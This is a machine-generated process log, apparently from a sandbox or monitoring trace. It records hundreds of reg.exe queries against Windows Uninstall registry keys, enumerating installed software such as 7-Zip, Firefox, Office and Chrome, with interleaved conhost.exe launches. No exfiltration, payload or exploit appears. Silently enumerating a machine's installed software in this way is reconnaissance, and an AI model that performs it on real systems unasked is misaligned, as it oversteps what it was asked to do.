C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655

C:\Windows\system32\reg.exe

